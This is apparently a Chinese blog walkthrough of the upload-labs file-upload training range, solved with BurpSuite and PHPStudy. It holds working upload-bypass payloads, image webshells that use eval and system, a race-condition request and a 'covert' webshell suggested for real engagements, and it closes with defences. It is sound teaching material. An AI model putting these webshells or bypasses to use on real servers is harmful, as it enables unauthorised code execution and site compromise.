从靶场到实战:用BurpSuite和PHPStudy复现upload-labs 19关的完整心路历程
从靶场到实战:用BurpSuite和PHPStudy复现upload-labs 19关的完整心路历程
第一次接触upload-labs靶场时,我完全是个安全小白。看着那些看似简单的文件上传界面,却隐藏着各种精妙设计的防御机制,每一步操作都像在解谜。本文将分享我如何从零开始搭建环境、使用工具,最终通关全部19关的完整过程,希望能给同样刚入门的你一些启发。
1. 环境搭建与工具准备
1.1 PHPStudy的安装与配置
作为Windows用户,我选择了PHPStudy作为本地服务器环境。安装过程看似简单,但有几个关键点需要注意:
- 版本选择:upload-labs需要PHP 5.2-5.4版本才能完整复现所有漏洞(特别是%00截断相关漏洞)。我最终选择了PHPStudy 2016版,内置PHP 5.4.45。
- 必要组件:在PHP设置中需要确保以下扩展已启用:
extension=php_exif.dll extension=php_gd2.dll
安装完成后,将upload-labs项目放入WWW目录,访问时却遇到了第一个坑——部分关卡无法正常显示上传结果。通过查看Apache错误日志发现需要修改httpd.conf:
# 原始配置 #AddType application/x-httpd-php .php .phtml # 修改后配置 AddType application/x-httpd-php .php .phtml .php5 .php31.2 BurpSuite的基础配置
BurpSuite是本次实战的核心工具,配置不当会导致抓包失败。我的配置步骤如下:
- 浏览器代理设置:Firefox需手动配置代理为127.0.0.1:8080
- CA证书安装:访问http://burp下载证书,导入到浏览器受信任的根证书颁发机构
- 关键功能熟悉:
- Proxy模块用于拦截和修改请求
- Repeater用于重复测试特定请求
- Intruder用于自动化爆破测试
注意:Windows Defender可能会拦截Burp的某些操作,测试时需要临时关闭实时保护。
2. 通关实战:从基础绕过到高级利用
2.1 前端验证的三种破解方式(Pass-01)
第一关看似简单,却教会了我重要的思维方式——不要相信客户端验证。通过查看网页源码发现前端JS验证:
function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (!file || file.length == 0) { alert("请选择要上传的文件!"); return false; } // 验证后缀名 if (file.lastIndexOf(".jpg") == -1 && file.lastIndexOf(".png") == -1) { alert("只允许上传jpg/png文件!"); return false; } }我尝试了三种绕过方法:
- 禁用浏览器JS:在Firefox中按F12 → 调试器 → 设置 → 禁用JavaScript
- 本地重构表单:
- 保存网页为HTML文件
- 删除验证函数
- 添加form的action属性:
action="http://localhost/upload-labs/Pass-01/index.php"
- Burp拦截修改:
- 上传合法jpg文件
- 拦截请求修改filename为shell.php
- 修改Content-Type为image/jpeg
2.2 黑名单绕过的进阶技巧(Pass-03~Pass-10)
从第三关开始,靶场采用服务端黑名单验证。通过源码审计发现关键代码:
$deny_ext = array('.asp','.aspx','.php','.jsp'); $file_ext = strtolower($file_ext); // 转换小写 $file_ext = str_ireplace('::$DATA', '', $file_ext); // 去除::$DATA $file_ext = trim($file_ext); // 收尾去空我系统性地尝试了多种绕过技术:
| 关卡 | 绕过方式 | 修改示例 | 原理说明 |
|---|---|---|---|
| Pass-03 | 非常规后缀 | shell.php5 | Apache配置解析漏洞 |
| Pass-05 | 大小写混合 | shell.PhP | Windows系统大小写不敏感 |
| Pass-06 | 空格截断 | shell.php[空格] | Windows自动去除末尾空格 |
| Pass-07 | 点号截断 | shell.php. | 特殊字符处理缺陷 |
| Pass-08 | NTFS特性 | shell.php::$DATA | Windows文件流特性 |
| Pass-10 | 双写绕过 | shell.pphphp | 替换逻辑缺陷 |
其中Pass-04的.htaccess利用最具教学意义。我创建了包含以下内容的文件:
AddType application/x-httpd-php .png先上传此文件,再上传包含PHP代码的png文件,即可实现任意代码执行。
2.3 白名单与条件竞争(Pass-11~Pass-18)
当遇到白名单验证时,常规绕过方法失效。Pass-11展示了经典的%00截断技术:
- 上传合法jpg文件
- Burp拦截修改POST参数:
save_path=../upload/shell.php%00 - 需要满足环境条件:
- PHP版本<5.3.4
- magic_quotes_gpc=Off
Pass-17则引入了条件竞争漏洞。我使用Burp Intruder进行自动化攻击:
- 配置攻击类型为"Pitchfork"
- 设置两个payload:
- Payload 1:上传请求(持续发送)
- Payload 2:访问请求(持续发送)
- 线程数设置为30,开始攻击
POST /upload-labs/Pass-17/index.php HTTP/1.1 Host: localhost Content-Length: 462 [...] -----------------------------223722916926728 Content-Disposition: form-data; name="upload_file"; filename="shell.php" Content-Type: application/octet-stream <?php phpinfo();?>3. 高级利用:二次渲染与自定义解析
3.1 图片马的制作与检测绕过(Pass-13~Pass-15)
当靶场检测文件内容时,需要制作能绕过检测的图片马。我总结了三种制作方法:
- 十六进制编辑法:
# 使用dd命令合并文件 dd if=original.jpg of=webshell.jpg bs=1 conv=notrunc echo '<?php eval($_POST["cmd"]);?>' >> webshell.jpg - Windows命令法:
copy /b test.jpg + shell.php webshell.jpg - 专业工具法:
- 使用GIMP等工具在图片元数据中插入代码
- 使用exiftool修改EXIF信息
针对不同检测函数需要不同处理:
| 检测函数 | 绕过方法 | 文件头特征 |
|---|---|---|
| getimagesize() | 添加合法文件头 | GIF89a |
| exif_imagetype() | 确保前2字节正确 | FF D8 (JPEG) |
| mime_content_type() | 修改Content-Type | image/jpeg |
3.2 二次渲染的对抗技巧(Pass-16)
这关让我真正理解了图像处理函数的危险性。通过Beyond Compare对比原始图片和渲染后图片:
- 上传正常jpg和包含代码的jpg
- 下载服务器端渲染后的文件
- 使用对比工具找出未被修改的部分
- 在保留区域插入PHP代码
我发现在JPEG的注释段(FF FE)和APPn标记段插入代码最有可能保留。最终使用的payload格式:
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF FE 00 13 3C 3F 70 68 70 20 70 68 70 69 6E 66 6F 28 29 3B 20 3F 3E4. 实战思维:从靶场到真实场景
4.1 漏洞原理的深度理解
通过这19关的实战,我总结出文件上传漏洞的三大核心防御缺陷:
验证不彻底:
- 只验证Content-Type
- 只检查文件头
- 不检查文件实际内容
解析不一致:
- Web服务器与系统解析差异
- 中间件配置错误
- 文件命名处理缺陷
逻辑缺陷:
- 条件竞争
- 删除操作延迟
- 权限控制缺失
4.2 真实环境中的注意事项
靶场环境与真实渗透测试有很大区别,需要特别注意:
- 法律合规:确保获得书面授权后再进行测试
- 环境差异:真实系统可能有WAF、杀毒软件等防护
- 隐蔽性要求:避免使用明显特征(如phpinfo())
- 权限控制:上传后可能需要结合其他漏洞提权
在真实项目中,我通常会采用更隐蔽的测试方法:
<?php // 更隐蔽的webshell if(isset($_GET['cmd'])){ header('Content-Type: text/plain'); system($_GET['cmd']); die(); } // 伪装成正常文件 echo 'This is a test image file.'; ?>4.3 防御方案的多层设计
从防御者角度,我总结了有效的防护策略:
前端防护:
- 文件类型白名单验证
- 文件重命名(MD5+后缀)
服务端防护:
$finfo = finfo_open(FILEINFO_MIME_TYPE); $mime = finfo_file($finfo, $_FILES['file']['tmp_name']); finfo_close($finfo); $allowed = ['image/jpeg', 'image/png']; if(!in_array($mime, $allowed)){ die('Invalid file type'); }系统层防护:
- 上传目录禁用脚本执行
- 设置open_basedir限制
- 定期安全扫描
整个通关过程让我深刻体会到,安全研究不仅是工具的使用,更是对系统运作原理的深入理解。每解决一个关卡,都需要思考防御者的设计意图和攻击者的突破路径。这种对抗性思维,才是安全工程师最核心的能力。